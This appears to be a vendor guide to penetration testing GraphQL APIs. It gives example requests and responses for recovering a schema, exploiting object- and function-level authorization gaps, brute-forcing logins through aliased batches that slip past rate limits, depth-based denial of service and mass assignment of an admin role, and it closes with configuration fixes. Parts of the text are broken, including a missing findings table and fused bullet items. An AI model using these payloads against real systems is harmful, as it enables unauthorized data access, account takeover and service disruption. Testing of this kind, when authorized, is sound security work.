
Here is the fact that decides how you test GraphQL: it returns HTTP 200 even when the request failed, with the real outcome buried in an errors array next to data in the JSON body. A DAST scanner that grades by status code sees a wall of 200s and concludes everything is fine, even as a malicious query inside the body reads another tenant's records. That is why GraphQL testing is almost entirely manual or agentic, and why a tool that confirms the endpoint 'speaks GraphQL' has told you nothing useful.
This guide walks the full process: recovering the schema (even when introspection is off), testing nested-resolver authorization where the real bugs hide, abusing aliasing and batching to defeat rate limits, measuring query-cost DoS, the tooling that makes it practical, and the configuration that fixes each finding. Example queries and real output are included throughout.
You recover the schema first, ideally through introspection, falling back to inference when it is disabled, because the schema is the entire roadmap: every type, query, mutation, and field. Start by fingerprinting the engine with graphw00f (Apollo, Hasura, and graphql-ruby leak differently and ship different defaults), then fire an introspection query:
POST /graphql HTTP/1.1
Content-Type: application/json
{ "query": "{ __schema { mutationType { fields { name } } } }" }
--- response ---
HTTP/1.1 200 OK
{ "data": { "__schema": { "mutationType": { "fields": [
{ "name": "updateUser" },
{ "name": "deleteUser" }, # <- admin-looking mutation, never called by the UI
{ "name": "impersonate" } ]}}}} # <- enumerate and try each with a low-priv tokenThat deleteUser and impersonate are immediate BFLA candidates. Load the introspection result into InQL to auto-generate fire-ready queries. If introspection is disabled, Clairvoyance rebuilds the schema from the field-suggestion text in error responses, which is why the toggle is not a security boundary (more on that next).
Turning off introspection slows an attacker by minutes, not more, because GraphQL error messages leak the schema anyway through 'Did you mean ...' field suggestions. Clairvoyance automates the reconstruction:
$ clairvoyance -o schema.json https://api.target.com/graphql
[+] Field suggestions enabled, inferring schema...
[+] Recovered 64 types, 38 queries, 19 mutations # <- introspection was OFF
[+] Wrote schema.jsonOn a recent assessment of a fintech GraphQL API, the client had proudly disabled introspection and listed it as a mitigating control in their last report. Clairvoyance rebuilt about 90% of the schema from suggestion messages in under ten minutes, including a refundPayment mutation the UI never exposed. The lesson is blunt: introspection toggles are operational hygiene, not a boundary. The boundary is authorization in every resolver, and that is where the real testing happens.
You test authorization per field and per object, because GraphQL enforces access inside resolvers that are easy to forget. BOLA and BFLA are as common here as in REST; they just appear inside a query argument or a mutation. A flat BOLA looks like passing another user's ID:
POST /graphql
{ "query": "{ user(id: 1052) { email phone ssn } }" }
--- response ---
HTTP/1.1 200 OK
{ "data": { "user": {
"email": "victim@x.com",
"ssn": "..." }}} # <- your token, victim's data = BOLAThe more common and more serious finding is the nested-resolver gap: a query you are allowed to run exposes a related object you are not, because the developer protected the top-level resolver and forgot the one it stitches in:
POST /graphql
{ "query": "{ order(id: 9) { total
customer { email ssn } } }" } # order is checked; customer is NOT
--- response ---
HTTP/1.1 200 OK
{ "data": { "order": { "total": 240,
"customer": { "email": "other@x.com" }}}} # <- nested authZ gapThat nested gap is the single most common serious GraphQL finding, and the reason is structural: most frameworks make it trivial to add an authorization directive on a query but offer no default protection on the resolvers that hydrate related types. A developer guards order, ships, and never realizes order.customer runs its own unguarded resolver. What good looks like is authorization enforced at the type or field level, so the check travels with the data regardless of which query reaches it. For BFLA, take every mutation InQL recovered (the deleteUser and refundPayment from earlier) and call each with a standard token. If the resolver runs, the function-level check was never written. Watch for the false positive here too: a mutation that returns { "errors": [{ "message": "Not authorized" }] } with a 200 status is enforced, not bypassed, so always read the body rather than trusting the code. The patterns mirror the API pentest checklist, expressed as queries rather than REST routes, and overlap heavily with REST API penetration testing.
The native GraphQL attack surface is query structure: depth, batching, and aliasing, which enable denial of service and rate-limit bypass that REST simply does not expose. The highest-value test is aliasing to defeat a login throttle. The server counts one HTTP request; you pack hundreds of login attempts into it:
POST /graphql
{ "query": "{
a: login(user:\"admin\", pw:\"123456\"){ token }
b: login(user:\"admin\", pw:\"password\"){ token }
c: login(user:\"admin\", pw:\"qwerty\"){ token }
... 500 more aliases ...
}" }
--- response ---
HTTP/1.1 200 OK # <- one request, 500 guesses, zero 429s: rate limit defeatedTo prove impact, do not just note the structure: send 200 guesses for a known username in one aliased request and show that none tripped the 429 a normal client hits after five. The other structural attacks:
{ author { posts { author { posts ... } } } }. Measure timing as you add levels. If five levels take 200ms and eight take 12 seconds, you have demonstrated a cost-limit gap without taking the server down.{ updateUser(input:{id:1, role:"ADMIN"}) { id } }. See mass assignment attacks.The findings table below is the shape of a real GraphQL report excerpt, with each gap tied to evidence and a config-level fix. The fixes map directly to the attacks above, and most are configuration rather than code rewrites:
maxDepth limit, query cost analysis, and per-operation timeouts. Pick the depth from the timing curve you measured.role can never be client-set.Treat GraphQL as a first-class part of your API security program. For continuous coverage across REST and GraphQL together, see how agentic pentesting runs these checks on every deploy.